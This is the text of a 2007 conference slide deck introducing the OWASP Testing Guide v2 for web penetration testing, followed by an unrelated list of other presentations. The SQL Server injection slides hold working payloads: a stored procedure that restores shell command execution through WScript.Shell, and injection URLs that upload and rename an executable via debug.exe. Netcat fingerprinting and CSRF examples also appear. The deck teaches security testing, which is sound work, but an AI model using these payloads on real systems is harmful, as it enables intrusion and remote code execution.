OWASP Testing Guide v2

OWASP Testing Guide v2

The new OWASP Testing Guide Matteo Meucci Alberto Revelli EUSecWest07 March 1st, 2007 London Copyright 2007 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License. The OWASP http://www.owasp.org Foundation Agenda: OWASP Projects The new Testing Guide: goals and deliverables The OWASP Testing Framework The Testing Methodology: how to test The reporting: how to evaluate the risk and write a report

How the Guide will be useful to the web security industry Q&A EUSecWest 07 OWASP 2 Introduction Who are we ? Matteo Meucci INS Consultant (www.ins.com), CISSP, CISA 6+ years on Information Security focusing on Application Security OWASP Italy founder and Chair OWASP Testing Guide lead 2007 Alberto Revelli Consultant for Spike Reply (www.reply.it) 5+ years of full-time penetration testing Developer of sqlninja Technical Director of the Italian chapter of OWASP EUSecWest 07

OWASP 3 The Open Web Application Security Project (OWASP) is dedicated to finding and fighting the causes of insecure software. The OWASP Foundation is a 501c3 not-for-profit charitable organization that ensures the ongoing availability and support for our work. Participation in OWASP is free and open to all. Everything here is free and open source. Main objectives: producing tools, standards and documentations related to Web Application Security. Thousands active members, 82 local chapters in the world Millions of hits on www.owasp.org EUSecWest 07 OWASP 4 BuildingGuide CLASP

Ajax Top 10 Training Conferences WebGoat Orizon .NET, Java Building our brand Yours! Chapters Testing Guide Project incubator WebScarab Validation

Certification EUSecWest 07 OWASP Wiki portal Forums Blogs 5 What Is the OWASP Testing Guide? Free and open EUSecWest 07 OWASP 6 What Is the OWASP Testing Guide? A puzzle piece Tools

Testing Guide Honeycomb Threat Agents Business Impacts Vulnerabilities Business Business Impact Impact Vulnerability Vulnerability System Impacts Countermeasures Asset Asset

Countermeasure Countermeasure Attacks Attack Attack EUSecWest 07 OWASP Code Review Guide Building Guide 7 OWASP Testing Guide v2: Goals Review all the documentation on testing: July 14, 2004 "OWASP Web Application Penetration Checklist",

Version 1.1 December 2004 "The OWASP Testing Guide", Version 1.0 Create a complete new project focused on Web Application Penetration Testing Create a reference for application testing Describe the OWASP methodology EUSecWest 07 OWASP 8 OWASP Testing Guide v2: Action Plan Oct 2006: Collect all old docs Brainstorming for the Index and template Involve major world experts on this field: * Vicente Aguilera * Mauro Bregolin

* Tom Brennan * Gary Burns * Luca Carettoni * Dan Cornell * Mark Curphey * Daniel Cuthbert * Sebastien Deleersnyder * Stephen DeVries * Stefano Di Paola EUSecWest 07 OWASP * David Endler * Giorgio Fedon * Javier Fernndez-Sanguino * Glyn Geoghegan * Stan Guzik * Madhura Halasgikar * Eoin Keary * David Litchfield * Andrea Lombardini * Ralph M. Los

* Claudio Merloni * Matteo Meucci * Marco Morana * Laura Nunez * Gunter Ollmann * Antonio Parata * Yiannis Pavlosoglou * Carlo Pelliccioni * Harinath Pudipeddi * Alberto Revelli * Mark Roxberry * Tom Ryan * Anush Shetty * Larry Shields * Dafydd Studdard * Andrew van der Stock * Ariel Waissbein * Jeff Williams 9

OWASP Testing Guide v2: Action Plan (2) Nov 2006: Write articles using our Wiki model Review articles Dec 2006: Review all the Guide Write the Guide in doc format Jan 2007: OWASP Testing Guide Release Candidate 1: 272 pages, 46 tests Feedback and review Feb 2007: OWASP Testing Guide v2 officially released EUSecWest 07 OWASP 10 Testing Guide v2: Index

1. Frontispiece 2. Introduction 3. The OWASP Testing Framework 4. Web Application Penetration Testing 5. Writing Reports: value the real risk Appendix A: Testing Tools Appendix B: Suggested Reading Appendix C: Fuzz Vectors EUSecWest 07 OWASP 11 The OWASP Testing Framework The problem of insecure software: companies next challenge Why OWASP? It's impossible to underestimate the importance of having this guide available in a completely free and open way Jeff Williams (OWASP Chair) Principles of Testing: comparing the state of something against a set of criteria defined and complete. We want security testing not be a black art

Testing Techniques: Manual Inspections & Reviews Threat Modeling Code Review Penetration Testing EUSecWest 07 OWASP 12 The OWASP Testing Framework Phase 1: Before Development Begins Before application development has started: Test to ensure that there is an adequate SDLC where security is inherent. Test to ensure that the appropriate policy and standards are in place for the development team. Develop Measurement and Metrics Criteria (Ensure Traceability)

EUSecWest 07 OWASP 13 The OWASP Testing Framework Phase 2: During Definition and Design Before application development has started: Security Requirements Review: User Management (password reset etc.), Authentication, Authorization, Data Confidentiality, Integrity, Accountability, Session Management,Transport Security, Privacy Design an Architecture Review Create and Review UML Models How the application works Create and Review Threat Models Develop realistic threat scenarios

EUSecWest 07 OWASP 14 The OWASP Testing Framework Phase 3: During Development Code Walkthroughs: high-level walkthrough of the code where the developers can explain the logic and flow. Code Reviews: Static code reviews validate the code against a set of checklists: CIA Triad OWASP Top10, OWASP Code Review Sox, ISO 17799, etc EUSecWest 07 OWASP 15

The OWASP Testing Framework Phase 4: During Deployment Application Penetration Testing Focus of this guide Configuration Management Testing The application penetration test should include the checking of how the infrastructure was deployed and secured. Phase 5: Maintenance and Operations Conduct operational management reviews Conduct periodic health checks Ensure change verification EUSecWest 07 OWASP 16 Web Application Penetration Testing

What is a Web Application Penetration Testing? The process involves an active analysis of the application for any weaknesses, technical flaws or vulnerabilities What is a vulnerability? A weakness on a asset that makes a threat possible Our approach in writing this guide Open Collaborative Defined testing methodology Consistent Repeatable Under quality EUSecWest 07 OWASP 17 Testing paragraph template Brief Summary

Describe in "natural language" what we want to test. The target of this section is non-technical people (e.g.: client executive) Description of the Issue Short Description of the Issue: Topic and Explanation Black Box testing and example How to test for vulnerabilities: Result Expected: ... Gray Box testing and example How to test for vulnerabilities: Result Expected: ... References Whitepapers Tools EUSecWest 07 OWASP 18

Black Box vs. Gray Box Black Box The penetration tester does not have any information about the structure of the application, its components and internals Gray Box The penetration tester has partial information about the application internals. E.g.: platform vendor, sessionID generation algorithm White box testing, defined as complete knowledge of the application internals, is beyond the scope of the Testing Guide and is covered by the OWASP Code Review Project EUSecWest 07 OWASP

19 Testing Model We have split the set of tests in 8 sub-categories (for a total amount of 48 controls): Information Gathering Business logic testing Authentication Testing Session Management Testing Data Validation Testing Denial of Service Testing Web Services Testing AJAX Testing In the next slides we will look at a few examples of tests/attacks and at some real-world cases .... EUSecWest 07 OWASP 20 Information Gathering The first phase in security assessment is of course focused on collecting all the information about a target application.

Using public tools it is possible to force the application to leak information by sending messages that reveal the versions and technologies used by the application Available techniques include: Raw HTTP Connections (netcat) The good ol' tools: nmap, amap, ... Web Spiders Search engines (Google Dorking) SSL fingerprinting File extensions handling Backups and unreferenced files EUSecWest 07 OWASP 21 Information Gathering (cont.) Application Fingerprint Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use along the tests. Netcat is the tool of choice for this very well known technique $ nc 80

HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Mon, 16 Jun 2003 02:53:29 GMT Server: Apache/1.3.3 (Unix) (Red Hat/Linux) Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT ETag: "1813-49b-361b4df6" Accept-Ranges: bytes Content-Length: 1179 Connection: close Content-Type: text/html ...But what if the Server: header is obfuscated ? EUSecWest 07 OWASP 22 Information Gathering (cont.) Other hints can be found by sending the server a malformed request, for instance a GET / HTTP/3.0 HTTP/1.1 400 Bad Request Date: Sun, 15 Jun 2003 17:12: 37 GMT

Server: obfuscated :P Connection: close Transfer: chunked Content-Type: text/HTML; charset=iso-8859-1 Apache 1.3.23 HTTP/1.1 505 HTTP Version Not Supported Server: obfuscated :P Date: Mon, 16 Jun 2003 06:04: 04 GMT Content-length: 140 Content-type: text/HTML Connection: close Netscape Enterprise 4.1 HTTP/1.1 200 OK Server: obfuscated :P Content-Location: http://target.com/Default.htm Date: Fri, 01 Jan 1999 20:14: 02 GMT Content-Type: text/HTML Accept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMT

ETag: W/e0d362a4c335be1: ae1 Content-Length: 133 IIS 5.0 ...But what if the application simply returns a generic error page ? EUSecWest 07 OWASP 23 Information Gathering (cont.) The good news is that each server has a favorite way to order headers ! Here are the results for some common web servers when responding to a HEAD / HTTP/1.0 command: Apache 1.3.23 Date Server Last-Modified ETag Accept-Ranges

Content-Length Connection: Content-Type EUSecWest 07 OWASP IIS 5.0 Server Content-Location Date Content-Type Accept-Ranges Last-Modified ETag Content-Length Netscape Enterprise 4.1 SunONE 6.1 Server Server Date Date Content-Type

Content-Length Last-Modified Content-Type Content-Length Last-Modified Accept-Ranges Connection 24 Business logic testing In this phase, we look for flaws in the application business logic rather than in the technical implementation. Areas of testing include: Rules that express the business policy (such as channels, location, logistics, prices, and products) Workflows that are the ordered tasks of passing documents or data from one participant (a person or a software system) to another One of the most common results in this step of the analysis are flaws in the order of actions that a user has to follow: an attacker could perform them in a different order to get some sort of advantage This step is the most difficult to perform with automated tools, as it requires the penetration tester to perfectly understand the business

logic that is (or should be) implemented by the application EUSecWest 07 OWASP 25 Business logic testing: example FlawedPhone, a mobile phone operator, has launched a webmail+SMS service: New customers, when buying a SIM card, can open a free, permanent webmail account with the flawedphone.com domain The webmail account is preserved even if the customer transfers the SIM card to another telecom operator However, as long as the SIM card is registered to FlawedPhone, each time an email is received an SMS message is sent to the customer The SMS application checks that the target phone number is a legitimate customer from its own copy of the FlawedPhone customers list Nice, but what about the list synchronization ?! EUSecWest 07

OWASP 26 Business logic testing FlawedPhone was soon targeted by a fraud attack The attacker bought a new FlawedPhone SIM card The attacker immediately requested to transfer the SIM card to another mobile carrier, which credits 0.05 for each received SMS message When the SIM card was transferred to the new provider, the attacker then started sending thousands of emails to her FlawedPhone email account The attacker had a 6-8 hours window before the email+SMS application had its list updated and stopped delivering messages By that time, the attacker had ~50-100 in the card, and proceeded to sell it on eBay All FlawedPhone systems worked as expected, and there were no bugs

in the application code. Still, the logic was flawed. EUSecWest 07 OWASP 27 Business logic testing: example Blackjack @ paradisepocker.com ...sometime in 2005 Deal 2 cards upcard == Ace ? no The difference between t1 and t2 was enough to give the player an edge over the house yes

hole == ten ? t1 yes t2 Offer Insurance t1 != t2 EUSecWest 07 OWASP 28 Authentication testing Testing the authentication scheme means understanding how the application checks for users' identity and using that information to circumvent that mechanism and access the application without having the proper credentials Tests include the following areas: Default or Guessable Accounts

Brute-force Bypassing Authentication Directory Traversal / File Include Vulnerable Remember Password and Password Reset Logout and Browser Cache Management EUSecWest 07 OWASP 29 Session management testing Session management is a critical part of a security test, as every application has to deal with the fact that HTTP is by its nature a stateless protocol. Session Management broadly covers all controls on a user from authentication to leaving the application Tests include the following areas: Analysis of the session management scheme Cookie and session token manipulation Exposed session variables Cross Site Request Forgery

HTTP Exploiting EUSecWest 07 OWASP 30 Example: Cross Site Request Forgery Test if it is possible to force a user to submit an undesirable command to the application he/she is currently logged into Also known as Session Riding A quite old type of attack, whose impact has always been underestimated It relies on the fact that browsers automatically send information used to identify a specific session Applications that allow a user to perform some action without requiring some unpredictable parameter are likely to be vulnerable ...That means a lot of applications! All it takes is to trigger the victim to follow a link (e.g.: by visiting an attacker-controlled site) while he/she is logged into the application

EUSecWest 07 OWASP 31 Example: Cross Site Request Forgery (cont.) trade.com is an online trading company trade.com uses an ber-paranoid triple-factor authentication scheme, but does not want to bother users with confirmations, since traders need to act fast! A simple website and some social engineering will do the job I am a very evil HTML page... visit me ! :) .. ... The link triggers a

fund transfer EUSecWest 07 OWASP The image is not visible 32 Data validation testing In this phase we test that all input is properly sanitized before being processed by the application, in order to avoid several classes of attacks Cross site scripting Test that the application filters JavaScript code that might be executed by the victim in order to steal his/her cookier HTTP Methods and XST Test that the remote web server does not allow the TRACE HTTP method SQL Injection Test that the application properly filters SQL code embedded in the user input Other attacks based of faulty input validation... LDAP/XML/SMTP/OS injection Buffer overflows

EUSecWest 07 OWASP 33 Data validation testing: Sql injection against SQL Server 2000 The remote user has not administrative privileges ? Select * from OPENROWSET ('SQLOLEDB','';'sa';'', 'waitfor delay ''0:0:5'';select 1') The xp_cmdshell procedure has been disabled ? CREATE PROCEDURE our_cmdshell(@cmd varchar(255), @Wait int = 1) AS DECLARE @result int, @OLEResult int, @RunResult int, @ShellID int EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT IF @OLEResult <> 0 SELECT @result = @OLEResult IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult) EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait IF @OLEResult <> 0 SELECT @result = @OLEResult IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult) EXECUTE @OLEResult = sp_OADestroy @ShellID

return @result Original code by Antonin Foller EUSecWest 07 OWASP Data validation testing: Sql injection against SQL Server 2000 We want to upload executables but the firewall is really paranoid ? 1) Convert the executable in a debug.exe script n prog.txt r cx 6e00 f 0100 ffff 00 e 100 4d 5a 90 2) Upload the script and call debug.exe on it. Now we have uploaded an executable using only normal http request :)

http://www.victim.com/login.asp? code=0;exec+master..our_cmdshell+'echo+n+prog.txt+>+prog.scr'; .... http://www.victim.com/login.asp? code=0;exec+master..our_cmdshell+'debug+<+prog.scr'; http://www.victim.com/checkid.asp? code=0;exec+master..our_cmdshell+'ren+prog.txt+prog.exe'; EUSecWest 07 OWASP Denial of Service Testing DoS are types of vulnerabilities within applications that can allow a malicious user to make certain functionality or sometimes the entire website unavailable. These problems are caused by bugs in the application, often resulting from malicious or unexpected user input Locking Customer Accounts User Specified Object Allocation User Input as a Loop Counter Writing User Provided Data to Disk Failure to Release Resources Storing too Much Data in Session Usually not performed in performed on production environments

EUSecWest 07 OWASP 36 Web Services Testing The vulnerabilities are similar to other classical vulnerabilities such as SQL injection, information disclosure and leakage etc but web services also have unique XML/parser related vulnerabilities. WebScarab (available for free at www.owasp.org) provides a plugin specifically targeted to Web Services. It can be used to craft SOAP messages that contains malicious elements in order to test how the remote system validates input EUSecWest 07 OWASP 37 Web Services Testing XML Structural Testing In this example, we see a snippet of XML code that violates the hierarchical structure of this language. A Web Service must be able to handle this kind of exceptions in a secure way

OWASP EOIN I am Malformed Example of XML Structural Test EUSecWest 07 OWASP 38 Web Services Testing (cont.) XML Large payload Another possible attack consists in sending to a Web Service a very large payload in an XML message. Such a message might deplete the resource of a DOM parser

I am a Large String (1MB) I am a Large String (1MB) I am a Large String (1MB)

0098666891726 EUSecWest 07 OWASP 39 Web Services Testing (cont.) Naughty SOAP attachments Binary files, including executables and document types that can contain malware, can be posted using a web service in several ways POST /Service/Service.asmx HTTP/1.1 Host: somehost Content-Type: text/xml; charset=utf-8

Content-Length: length SOAPAction: http://somehost/service/UploadFile eicar.pdf pdf X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* true EUSecWest 07 OWASP 40 AJAX Testing AJAX (Asynchronous JavaScript and XML)

is a web development technique used to create more interactive web applications. XMLHttpRequest object and JavaScript to make asynchronous requests for all communication with the server-side application. Main security issues: AJAX applications have a greater attack surface because a big share of the application logic is moved on the client side AJAX programmers seldom keep an eye on what is executed by the client and what is executed by the server Exposed internal functions of the application Client access to third-party resources with no built-in security and encoding mechanisms Failure to protect authentication information and sessions AJAX Bridging

EUSecWest 07 OWASP 41 AJAX Testing While in traditional web applications it is very easy to enumerate the points of interaction between clients and servers, when testing AJAX pages things get a little bit more complicated, as server-side AJAX endpoints are not as easy or consistent to discover To enumerate endpoints, two approaches must be combined: Look through HTML and Javascript (e.g: look for XmlHttpRequest objects) Use a proxy to monitor traffic Tools: OWASP Sprajax or Firebug add-on for Firefox Then you can test it as described before (SQL Inj, etc..) ...and don't forget AJAX potential in prototype hijacking and resident XSS ! EUSecWest 07

OWASP 42 AJAX Testing (cont.) EUSecWest 07 OWASP With firebug it is possible to efficiently inspect AJAX apps 43 Testing Report: model The OWASP Risk Rating Methodology Estimate the severity of all of these risks to your business This is not universal risk rating system: vulnerability that is critical to one organization may not be very important to another Simple approach to be tailored for every case standard risk model: Risk = Likelihood * Impact

Step 1: identifying a risk You'll need to gather information about: the the the the vulnerability involved threat agent involved attack they're using impact of a successful exploit on your business. EUSecWest 07 OWASP 44 Testing Report: likelihood

Step 2: factors for estimating likelihood Generally, identifying whether the likelihood is low, medium, or high is sufficient. Threat Agent Factors: Skill level (0-9) Motive (0-9) Opportunity (0-9) Size (0-9) Vulnerability Factors: Ease of discovery (0-9) Ease of exploit (0-9) Awareness (0-9)

Intrusion detection (0-9) EUSecWest 07 OWASP 45 Testing Report: impact Step 3: factors for estimating impact Technical impact: Loss Loss Loss Loss of of of

of confidentiality (0-9) integrity (0-9) availability (0-9) accountability (0-9) Business impact: Financial damage (0-9) Reputation damage (0-9) Non-compliance (0-9) Privacy violation (0-9) EUSecWest 07 OWASP 46

Testing Report: value the risk Step 4: determining the severity of the risk In the example above, the likelihood is MEDIUM, and the technical impact is HIGH, so from technical the overall severity is HIGH. But business impact is actually LOW, so the overall severity is best described as LOW as well. EUSecWest 07 OWASP 47 Testing Report: decide what to fix Step 5: Deciding What To Fix As a general rule, you should fix the most severe risks first. Some fix seems to be not justifiable based upon the cost of fixing the issue but may be reputation damage from the fraud that could cost the organization much more than implement a security control Step 6: Customizing Your Risk Rating Model Adding factors Customizing options Weighting factors

EUSecWest 07 OWASP 48 Writing Report I. Executive Summary II. Technical Management Overview III Assessment Findings IV Toolbox EUSecWest 07 OWASP 49 How the Guide will help the security industry Pentesters Clients

A structured approach to the testing activities A checklist to be followed A learning and training tool A tool to understand web vulnerabilities and their impact A way to check the quality of the penetration tests they buy More in general, the Guide aims to provide a pen-testing standard that creates a 'common ground' between the pen-testing industry and its client. This will raise the overall quality and understanding of this kind of activity and therefore the general level of security in our infrastructures EUSecWest 07 OWASP 50 Whats next You should adopt this guide in your organization Continuously reprioritize OWASP Testing Guide next steps:

Continuously improve the Testing Guide: its a live document! Contribute to the new version Improve the client side testing EUSecWest 07 OWASP 51 Thank you! http://www.owasp.org http://www.owasp.org/ OWASP_Testing_Project [email protected] [email protected] EUSecWest 07 OWASP 52

Recently Viewed Presentations

  • cdvxcgfgdfghhg - UQAM

    cdvxcgfgdfghhg - UQAM

    [email protected] Jean-Pierre Faucher, Consultant Jean-Pierre Faucher, Consultant Thank you Mr. My name is JPF and I am a consultant in the Video Game and Interactive medias industries. I offer a certain number of services and I have a large network...
  • COM/BLM 376 Computer Architecture

    COM/BLM 376 Computer Architecture

    However,many systems allow addressing at the byte level. In any case, the relationshipbetween the length in bits . A . of an address and the number . N . of addressableunits is 2. A = N. Unit . of transfer:...
  • Retensi Urin Akut (Aur)

    Retensi Urin Akut (Aur)

    The initial management of AUR consists of immediate bladder decompression with urethral or suprapubic catheterization. Order specific diagnostic imaging. Treat underlying disease. Desgrandchamps. F, De la Taille A, Doublet J. Management of acute urinary retention in France: a cross-sectional survey...
  • Cell biology - جامعة نزوى

    Cell biology - جامعة نزوى

    what are the fundamental properties that characterize living things and distinguish them from non-living ? All living things are made of cells: small, membrane-enclosed units filled with a concentrated aqueous solution of chemicals and endowed with the extraordinary ability to...
  • Writing a Summary - Bloomfield College

    Writing a Summary - Bloomfield College

    Writing a Summary Definition of a Summary "A summary is a condensed version of a larger reading. A summary is not a rewrite of the original piece . . . To write a summary, use your own words to express...
  • SHOT GUN INJURY Exit Wound  Is usually not

    SHOT GUN INJURY Exit Wound Is usually not

    Calibri Arial Garamond Wingdings Verdana Office Theme 1_Office Theme Slide 1 Slide 2 SHOT GUN INJURY Slide 4 IDENTIFICATION OF FIREARMS DERMAL NITRATE TEST ( PARAFFIN TEST )
  • 302 Involuntary Evaluation Process

    302 Involuntary Evaluation Process

    The ER Physician will evaluate the individual and consult with the attending Psychiatrist on the Psych Unit as needed. If it is determined that the individual is in need of inpatient treatment, he/she will be transferred to the psych unit...
  • Chemistry Conversions

    Chemistry Conversions

    We will convert A LOT! Uses a technique called Factor Label Method. Cancels out units and does the math for you!! ... The conversion factor needed to go from feet to inches or from inches to feet is . 1...